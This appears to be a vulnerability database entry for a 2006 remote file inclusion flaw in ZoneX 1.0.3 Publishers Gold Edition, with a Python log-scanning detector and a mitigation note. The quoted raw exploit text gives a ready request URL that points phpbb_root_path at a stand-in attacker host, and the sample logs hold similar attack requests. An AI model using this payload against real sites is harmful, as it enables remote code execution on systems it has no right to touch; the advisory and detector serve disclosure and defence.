Vendor: Publishers Gold Edition
By: xoron
CVSS: 7.5 (HIGH)
Type: Remote File Inclusion
CWE: 98
Product Name: Publishers Gold Edition
Affected Version From: 1.0.3
Affected Version To: 1.0.3
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
Year: 2006

ZoneX 1.0.3 – Publishers Gold Edition Remote File Inclusion Vulnerability

ZoneX 1.0.3 - Publishers Gold Edition contains a remote file inclusion vulnerability. The script includes/usercp_register.php builds an include() path from the phpbb_root_path parameter, so an attacker can exploit it by sending a specially crafted HTTP request with a malicious URL in that parameter. This can allow the attacker to execute arbitrary code on the vulnerable system.
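
The request described above leaves a trace in web server access logs. The Python code below is an added example, not part of the original advisory: it flags requests whose phpbb_root_path value points at a remote location, including percent-encoded values that a plain text search for "http://" would miss. The log format (Common/Combined Log Format), the function name rfi_attempts and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Request field of a Common/Combined Log Format line (assumed log format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Value begins with a URL scheme (http:, ftp:, php:, data:) or a "//host" form.
REMOTE_RE = re.compile(r'^\s*(?:[a-z][a-z0-9+.\-]*:|//)', re.IGNORECASE)
PARAM = "phpbb_root_path"  # parameter named in the advisory


def rfi_attempts(log_lines):
    """Return (line_no, client, path, value) for each request whose
    phpbb_root_path query value points at a remote location."""
    hits = []
    for line_no, line in enumerate(log_lines, 1):
        match = REQUEST_RE.search(line)
        if not match:
            continue  # not a parsable request line
        try:
            url = urlsplit(match.group(1))
        except ValueError:
            continue  # malformed request target
        client = line.split(" ", 1)[0]
        # parse_qsl percent-decodes, so http%3A%2F%2F... is seen as http://...
        for key, value in parse_qsl(url.query, keep_blank_values=True):
            if key == PARAM and REMOTE_RE.match(value):
                hits.append((line_no, client, url.path, value))
    return hits


# Constructed sample log lines (documentation IP ranges and example.* hosts).
SAMPLE_LOG = [
    '192.0.2.10 - - [07/Aug/2006:10:00:01 +0000] "GET /forum/index.php HTTP/1.1" 200 5120',
    '192.0.2.44 - - [07/Aug/2006:10:00:07 +0000] "GET /forum/includes/usercp_register.php'
    '?phpbb_root_path=http://files.example.net/x? HTTP/1.1" 200 312',
    '198.51.100.7 - - [07/Aug/2006:10:00:09 +0000] "GET /forum/includes/usercp_register.php'
    '?phpbb_root_path=http%3A%2F%2Ffiles.example.net%2Fx HTTP/1.1" 200 298',
    '192.0.2.10 - - [07/Aug/2006:10:01:30 +0000] "GET /forum/profile.php'
    '?mode=register&phpbb_root_path=./ HTTP/1.1" 200 8841',
]

if __name__ == "__main__":
    for hit in rfi_attempts(SAMPLE_LOG):
        print(hit)
```

Access logs normally record only the query string, so a value delivered in a POST body or a cookie would not appear in this output.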

Mitigation:

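Ensure that user input is properly sanitized and validated before it is used in a file inclusion operation. In this case, the value of phpbb_root_path that reaches the include() call must not come from the HTTP request.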

Exploit-DB raw data:

///////////////////CYBER-WARRiOR.ORG\\\\\\\\\\\\\\\\\\\\\
#ZoneX 1.0.3 - Publishers Gold Edition  Remote File Inclusion Vulnerability
-
#Author: xoron
-
#script: ZoneX 1.0.3 - Publishers Gold Edition
-
#Class : Remote
-
#cont@ct: x0r0n[at]hotmail[dot]com
-
#CODE:    include($phpbb_root_path . 'newsletter/scripts/subscriptions.' .$phpEx)
-
#Exploit: http://www.site.com/[path]/includes/usercp_register.php?phpbb_root_path=http://evil_scripts?
-
#Thanx : WWW.CYBER-WARRiOR.ORG
-
#Greetz: DJR, x-mastER, R3D4C!D and all cyber-warrior users.
///////////////////CYBER-WARRiOR.ORG\\\\\\\\\\\\\\\\\\\\\

# milw0rm.com [2006-08-07]